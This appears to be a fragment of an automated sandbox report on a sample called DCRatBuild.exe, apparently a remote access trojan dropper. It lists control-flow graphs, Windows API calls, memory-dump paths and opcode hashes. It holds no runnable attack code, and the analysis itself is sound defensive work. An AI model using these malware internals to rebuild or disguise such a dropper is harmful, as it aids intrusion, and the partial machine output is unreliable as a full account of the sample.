                                        control_flow_graph 939 7399b0-7399d1 call 74e360 942 7399d3-7399d6 939->942 943 7399dc 939->943 942->943 944 7399d8-7399da 942->944 945 7399de-7399fb 943->945 944->945 946 739a03-739a0d 945->946 947 7399fd 945->947 948 739a12-739a31 call 7370bf 946->948 949 739a0f 946->949 947->946 952 739a33 948->952 953 739a39-739a57 CreateFileW 948->953 949->948 952->953 954 739abb-739ac0 953->954 955 739a59-739a7b GetLastError call 73b66c 953->955 957 739ac2-739ac5 954->957 958 739ae1-739af5 954->958 964 739aaa-739aaf 955->964 965 739a7d-739a9f CreateFileW GetLastError 955->965 957->958 959 739ac7-739adb SetFileTime 957->959 960 739b13-739b1e 958->960 961 739af7-739b0f call 73fe56 958->961 959->958 961->960 964->954 969 739ab1 964->969 967 739aa1 965->967 968 739aa5-739aa8 965->968 967->968 968->954 968->964 969->954
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,007378AD,?,00000005,?,00000011), ref: 00739A4C
                                        • GetLastError.KERNEL32(?,?,007378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00739A59
                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,007378AD,?,00000005,?), ref: 00739A8E
                                        • GetLastError.KERNEL32(?,?,007378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00739A96
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,007378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00739ADB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: 5b5b38b69e9432815d6250b239698bc91689ccad4cff0ece23491326499950ea
                                        • Instruction ID: ad5f591f2ca46746cc0b43a406df7940eb222744242302968cb9fb865455a9a4
                                        • Opcode Fuzzy Hash: 5b5b38b69e9432815d6250b239698bc91689ccad4cff0ece23491326499950ea
                                        • Instruction Fuzzy Hash: D7413571544746AFF3208B20CC09BDABBD4BB05324F104719F6E5961D2E7FDA988CB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 998 74ac74-74ac8d PeekMessageW 999 74ac8f-74aca3 GetMessageW 998->999 1000 74acc8-74accc 998->1000 1001 74acb4-74acc2 TranslateMessage DispatchMessageW 999->1001 1002 74aca5-74acb2 IsDialogMessageW 999->1002 1001->1000 1002->1000 1002->1001
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074AC85
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074AC96
                                        • IsDialogMessageW.USER32(00050160,?), ref: 0074ACAA
                                        • TranslateMessage.USER32(?), ref: 0074ACB8
                                        • DispatchMessageW.USER32(?), ref: 0074ACC2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: 05b0127272dbd0130ea2b9c1e76d618cb02dca1adfbbbe473709c2e04d37ea4d
                                        • Instruction ID: 952eb8b25ae9fc68f9561a16b34c02609bcda4c4079fb130fd2b516916116ef5
                                        • Opcode Fuzzy Hash: 05b0127272dbd0130ea2b9c1e76d618cb02dca1adfbbbe473709c2e04d37ea4d
                                        • Instruction Fuzzy Hash: E3F01D71902229BB8B60ABE5EC4CEEB7F6CEE052917408416F909D2101EB2CD407C7B5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1003 7576bd-7576ca 1004 7576cc-7576d0 1003->1004 1005 7576e8-757711 call 75b290 GetModuleFileNameA 1003->1005 1004->1005 1006 7576d2-7576e3 call 75895a call 758839 1004->1006 1011 757713-757716 1005->1011 1012 757718 1005->1012 1017 7577dc-7577e0 1006->1017 1011->1012 1014 75771a-757744 call 7577e1 call 757956 1011->1014 1012->1014 1021 757746-757750 call 75895a 1014->1021 1022 757752-75776f call 7577e1 1014->1022 1027 757783-757785 1021->1027 1028 757787-75779a call 75ada3 1022->1028 1029 757771-75777e 1022->1029 1030 7577d1-7577db call 7584de 1027->1030 1035 7577a1-7577aa 1028->1035 1036 75779c-75779f 1028->1036 1029->1027 1030->1017 1038 7577b4-7577c1 1035->1038 1039 7577ac-7577b2 1035->1039 1037 7577c7-7577ce call 7584de 1036->1037 1037->1030 1038->1037 1039->1038 1039->1039
                                        APIs
                                        • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 007576FD
                                        • _free.LIBCMT ref: 007577C8
                                        • _free.LIBCMT ref: 007577D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                        • API String ID: 2506810119-119056061
                                        • Opcode ID: d60c41c82ba6fa5b7a6502109c97ace123e69b31139995abbdb18ab4e48734ea
                                        • Instruction ID: 7478d856c54610e09b93613c81b808002902ea027796a03d03d782e3ee141869
                                        • Opcode Fuzzy Hash: d60c41c82ba6fa5b7a6502109c97ace123e69b31139995abbdb18ab4e48734ea
                                        • Instruction Fuzzy Hash: 6A319171A04209EFDB25DF99FC859DEBBFCEB88311F144066EC0497200DAB85E49CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1042 74a2c7-74a2e6 GetClassNameW 1043 74a30e-74a310 1042->1043 1044 74a2e8-74a2fd call 7417ac 1042->1044 1045 74a312-74a315 SHAutoComplete 1043->1045 1046 74a31b-74a31f 1043->1046 1049 74a30d 1044->1049 1050 74a2ff-74a30b FindWindowExW 1044->1050 1045->1046 1049->1043 1050->1049
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 0074A2DE
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0074A315
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0074A305
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 252181976588606a6b9cad29420f192f42a2f56e8b3ef8db0331a012a9660fe3
                                        • Instruction ID: 585750d7b13d38d8488fb6ac9b17be3cc624bc17e6e06407b08b8ffb34bf9c19
                                        • Opcode Fuzzy Hash: 252181976588606a6b9cad29420f192f42a2f56e8b3ef8db0331a012a9660fe3
                                        • Instruction Fuzzy Hash: F9F0A732A4122CB7E7306A689C09FDB776C9F46B50F444066BD05E2181E768AD43C6FA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1051 74d287-74d2b2 call 74e360 SetEnvironmentVariableW call 73fbd8 1055 74d2b7-74d2bb 1051->1055 1056 74d2bd-74d2c1 1055->1056 1057 74d2df-74d2e3 1055->1057 1058 74d2ca-74d2d1 call 73fcf1 1056->1058 1061 74d2c3-74d2c9 1058->1061 1062 74d2d3-74d2d9 SetEnvironmentVariableW 1058->1062 1061->1058 1062->1057
                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0074D29D
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0074D2D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: 88a4d696ba82d84e9845c3c4690be072a5a00a6d60d4a693a48e35f5339d01c8
                                        • Instruction ID: 15cdc176e8c9df90ad614b52961dcb6da4f0d1f09efa2d4c8610e9ba314a4100
                                        • Opcode Fuzzy Hash: 88a4d696ba82d84e9845c3c4690be072a5a00a6d60d4a693a48e35f5339d01c8
                                        • Instruction Fuzzy Hash: 07F0A7B2D0162CE6DB302FA49C19ABA7759BF09B91F004112FC8566141D7ACCD40D7F1
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 0073985E
                                        • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00739876
                                        • GetLastError.KERNEL32 ref: 007398A8
                                        • GetLastError.KERNEL32 ref: 007398C7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 4950f23b6d81a6628367289e005ebd9a71cb7adae667c08a8f3263d5d0a31ea5
                                        • Instruction ID: 980d0007d3489d23b2db4ce24b083c8a08b2ffd560f0d5542ad64150b02ffb76
                                        • Opcode Fuzzy Hash: 4950f23b6d81a6628367289e005ebd9a71cb7adae667c08a8f3263d5d0a31ea5
                                        • Instruction Fuzzy Hash: 1C11AC32904204EBFB205F55C804AE977A9EB82730F10C12AFA2A85682D7FD9E44DF51
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00753713,00000000,00000000,?,0075A49B,00753713,00000000,00000000,00000000,?,0075A698,00000006,FlsSetValue), ref: 0075A526
                                        • GetLastError.KERNEL32(?,0075A49B,00753713,00000000,00000000,00000000,?,0075A698,00000006,FlsSetValue,00767348,00767350,00000000,00000364,?,00759077), ref: 0075A532
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0075A49B,00753713,00000000,00000000,00000000,?,0075A698,00000006,FlsSetValue,00767348,00767350,00000000), ref: 0075A540
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: c45c78084096087d977697a43c8438324f695f3c55205324bdaa656c04c02f1c
                                        • Instruction ID: f21ce09c112747798c6100370eed7008635772487130ddf7eace763fcaaf5f79
                                        • Opcode Fuzzy Hash: c45c78084096087d977697a43c8438324f695f3c55205324bdaa656c04c02f1c
                                        • Instruction Fuzzy Hash: 3501FC32611326BBCB218A689C44E967B58AF457A27214730FD07D7140E7BDD914CAD5
                                        APIs
                                          • Part of subcall function 00758FA5: GetLastError.KERNEL32(?,00770EE8,00753E14,00770EE8,?,?,00753713,00000050,?,00770EE8,00000200), ref: 00758FA9
                                          • Part of subcall function 00758FA5: _free.LIBCMT ref: 00758FDC
                                          • Part of subcall function 00758FA5: SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 0075901D
                                          • Part of subcall function 00758FA5: _abort.LIBCMT ref: 00759023
                                          • Part of subcall function 0075B2AE: _abort.LIBCMT ref: 0075B2E0
                                          • Part of subcall function 0075B2AE: _free.LIBCMT ref: 0075B314
                                          • Part of subcall function 0075AF1B: GetOEMCP.KERNEL32(00000000,?,?,0075B1A5,?), ref: 0075AF46
                                        • _free.LIBCMT ref: 0075B200
                                        • _free.LIBCMT ref: 0075B236
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID: v
                                        • API String ID: 2991157371-2951754918
                                        • Opcode ID: 11cf73dd9e8203683a57fc706194d15b768a88c52e89b640c1ffe9a0cacd8d24
                                        • Instruction ID: 5594b1d45accd225e391c5a7ecde7c07ffe72fb649bcd7853612246c4e7f2ee2
                                        • Opcode Fuzzy Hash: 11cf73dd9e8203683a57fc706194d15b768a88c52e89b640c1ffe9a0cacd8d24
                                        • Instruction Fuzzy Hash: 4931E431904248EFDB50AF58C845AED77E0EF40322F204099ED049B291EBB95D49CB61
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0073CC94,00000001,?,?,?,00000000,00744ECD,?,?,?), ref: 00739F4C
                                        • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00744ECD,?,?,?,?,?,00744972,?), ref: 00739F8E
                                        • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0073CC94,00000001,?,?), ref: 00739FB8
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: fa9816adcd0c6a30d1bfe7ee2cc2157a3c28d74a789b2d0e1443eda088578a69
                                        • Instruction ID: 469c6722756d695dc9d2522e3d134d2cb40ffa9db2a000ee39b3ccedcfb036a5
                                        • Opcode Fuzzy Hash: fa9816adcd0c6a30d1bfe7ee2cc2157a3c28d74a789b2d0e1443eda088578a69
                                        • Instruction Fuzzy Hash: 02310471608306ABEF148F14D948B6ABBA4EB50750F048558F985DA183D7B9DD48CBA2
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A22E
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A261
                                        • GetLastError.KERNEL32(?,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A27E
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast
                                        • String ID:
                                        • API String ID: 2485089472-0
                                        • Opcode ID: 9637ba6fce0f7d6a133377114f02c40df10305b9e22c9c6df95245f4a28c77b7
                                        • Instruction ID: 14f329e17ffc9b2857da8ddc28a2048f6665f5186e92375f7a0aa3ed06e3059a
                                        • Opcode Fuzzy Hash: 9637ba6fce0f7d6a133377114f02c40df10305b9e22c9c6df95245f4a28c77b7
                                        • Instruction Fuzzy Hash: 3D018C31540218B6FB32ABA44C0BFEB7358BF4A781F044455F981D6093DBAE8A81C6A7
                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0075B019
                                        Strings
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        • Opcode ID: a3a745e41fea986707b30a4c08e1440c6e85a2f6843308b8cb5e055547269282
                                        • Instruction ID: ba26c10f0646e1d6fe2276f7b873c43802acbf79a14443d412e3492cca64dbcb
                                        • Opcode Fuzzy Hash: a3a745e41fea986707b30a4c08e1440c6e85a2f6843308b8cb5e055547269282
                                        • Instruction Fuzzy Hash: 6E41087050478C9ADF218E248C95BF7BBA9EB45305F2404EDE99E87182E3799A49CF60
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0075A79D
                                        Strings
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        • Opcode ID: 9f25de94a860a83d142d8b73fad5f01009a881646fe059c2dd4457b88cb0256a
                                        • Instruction ID: e2a7edd9611566233429ad88a7eb254dca955ce35906d0855c980546c4c2413c
                                        • Opcode Fuzzy Hash: 9f25de94a860a83d142d8b73fad5f01009a881646fe059c2dd4457b88cb0256a
                                        • Instruction Fuzzy Hash: 6C010272540209BBCF065FA0DC05DEE3F66EB0D760F008224FE1525160CABA8931EB95
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00759D2F), ref: 0075A715
                                        Strings
                                        • InitializeCriticalSectionEx, xrefs: 0075A6E5
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        • Opcode ID: 5ff59aa3aca518b383ff7f6e0f72a030a884d8611cbe76bc6dbdc10bd9cb72dc
                                        • Instruction ID: 7752c7f7a5c9134132b35f276f8edd854b71eeba2b6bfb99cee4b8d8c5bc8c9c
                                        • Opcode Fuzzy Hash: 5ff59aa3aca518b383ff7f6e0f72a030a884d8611cbe76bc6dbdc10bd9cb72dc
                                        • Instruction Fuzzy Hash: 9FF0E27164520CFBCF056F65CC09CAE7F61FF49761B008264FC0A2A260DAB94E20EB95
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        • Opcode ID: 7f45fdd87bacd79cf78b8e3cff1a536e9c30ea4aa034845b89165489d6a69e61
                                        • Instruction ID: aab94f563a166fd8ecdd601576bb6da54274b40bcb9ef3efe52f119777607a73
                                        • Opcode Fuzzy Hash: 7f45fdd87bacd79cf78b8e3cff1a536e9c30ea4aa034845b89165489d6a69e61
                                        • Instruction Fuzzy Hash: 49E05C7074535CBB82146B54CC05CADBB50DB15721B004224FC0767240DDFC0E00D2EA
                                        APIs
                                        • try_get_function.LIBVCRUNTIME ref: 007532AF
                                        Strings
                                        Similarity
                                        • API ID: try_get_function
                                        • String ID: FlsAlloc
                                        • API String ID: 2742660187-671089009
                                        • Opcode ID: 91021ee668e2bad96ecb06618d644243e3d851cf3b3953d9658e5e926589189b
                                        • Instruction ID: 7608f0437febecb3be360da45a4934493795526d619ed223362849f19d77f88b
                                        • Opcode Fuzzy Hash: 91021ee668e2bad96ecb06618d644243e3d851cf3b3953d9658e5e926589189b
                                        • Instruction Fuzzy Hash: C9D02B61780F3CFA811032D0AC039EE7E048701FF3F450252FF0E1A19285ED490091E9
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074E20B
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Strings
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 3Ro
                                        • API String ID: 1269201914-1492261280
                                        • Opcode ID: 9f92508fd3fe395b92688a8d131f5b88e1f548ba6f24580d7e2f3f7a7d3d5abb
                                        • Instruction ID: 11e8162cd7f5b4f79b07f295ac6a8ec15a5635f8e312abebaad06abd1a8634e7
                                        • Opcode Fuzzy Hash: 9f92508fd3fe395b92688a8d131f5b88e1f548ba6f24580d7e2f3f7a7d3d5abb
                                        • Instruction Fuzzy Hash: 24B012E126E001FC371C21047E1AC37031CD4C1B60330802BB616D44829B8D4D4E4032
                                        APIs
                                          • Part of subcall function 0075AF1B: GetOEMCP.KERNEL32(00000000,?,?,0075B1A5,?), ref: 0075AF46
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0075B1EA,?,00000000), ref: 0075B3C4
                                        • GetCPInfo.KERNEL32(00000000,0075B1EA,?,?,?,0075B1EA,?,00000000), ref: 0075B3D7
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 5cd1b9eea34a3139709572777997ecbe871ed4ca6f08f52fb6f65839e2c6ccce
                                        • Instruction ID: 696460f8cbe7cfa3589b97716ce7dcef69867b95f66c4c816eef022a07ce54f0
                                        • Opcode Fuzzy Hash: 5cd1b9eea34a3139709572777997ecbe871ed4ca6f08f52fb6f65839e2c6ccce
                                        • Instruction Fuzzy Hash: 145147709002869FDB348F71C8856FABBE5EF41311F18816ED8868B253E7BD954ACB91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00736057: __EH_prolog.LIBCMT ref: 0073605C
                                          • Part of subcall function 0073C827: __EH_prolog.LIBCMT ref: 0073C82C
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C86F
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C893
                                        • new.LIBCMT ref: 007313FE
                                          • Part of subcall function 0073B07D: __EH_prolog.LIBCMT ref: 0073B082
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 7f0629b9067d1f88e1eb6443276d69a0727f13525ee1d8ae80443558adf988a2
                                        • Instruction ID: b2dbc45e92e9df3232460fe6690724c53c64fe9e398e5a681e382a9a302d907a
                                        • Opcode Fuzzy Hash: 7f0629b9067d1f88e1eb6443276d69a0727f13525ee1d8ae80443558adf988a2
                                        • Instruction Fuzzy Hash: 8D4114B0805B40DEE724DF7984899E7FBE5FB18310F904A2ED6EE83282DB766554CB11
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00736057: __EH_prolog.LIBCMT ref: 0073605C
                                          • Part of subcall function 0073C827: __EH_prolog.LIBCMT ref: 0073C82C
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C86F
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C893
                                        • new.LIBCMT ref: 007313FE
                                          • Part of subcall function 0073B07D: __EH_prolog.LIBCMT ref: 0073B082
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 952c51eed06c7bcf5416b2cef0f10a6904235368f91e63bf85c368207ddb3870
                                        • Instruction ID: 5bc075eda6470e37fc946ac5f054374fb71c7dd221882302cf8060e7538ba5b7
                                        • Opcode Fuzzy Hash: 952c51eed06c7bcf5416b2cef0f10a6904235368f91e63bf85c368207ddb3870
                                        • Instruction Fuzzy Hash: 8B4114B0805B40DEE724DF7984899E7FBE5FB18310F904A2ED6EE83282DB766554CB11
                                        APIs
                                        • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00739EDC,?,?,00737867), ref: 007397A6
                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00739EDC,?,?,00737867), ref: 007397DB
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 63d64022e68b56484ce979a5c6f7c2cb8639b92476e83e2accb9776cfd3a615b
                                        • Instruction ID: 6dfd3b9ee4cc0d7d816748e9c17a8e9c60a10db1638b85fb79c4d4b1cbb0aac3
                                        • Opcode Fuzzy Hash: 63d64022e68b56484ce979a5c6f7c2cb8639b92476e83e2accb9776cfd3a615b
                                        • Instruction Fuzzy Hash: 9A21B6B1514744EEF7308F64C885BA7B7E8EB49764F00491DF6D5821D2C3B8AC498A61
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00737547,?,?,?,?), ref: 00739D7C
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00739E2C
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: 9f3ce6bdc7700172099b08cb0ae371da2b19dd02cdf9d2685a1a8bf4cd8017f2
                                        • Instruction ID: ec61ca784f13287f558428b85c279cbcc20ca85dceaa36b8a8122bf2e608f7e0
                                        • Opcode Fuzzy Hash: 9f3ce6bdc7700172099b08cb0ae371da2b19dd02cdf9d2685a1a8bf4cd8017f2
                                        • Instruction Fuzzy Hash: 9821D371268246ABE714DE24C896AABBBE4AF95704F04481CF9D187142D36DEE0CDBA1
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0075A4B8
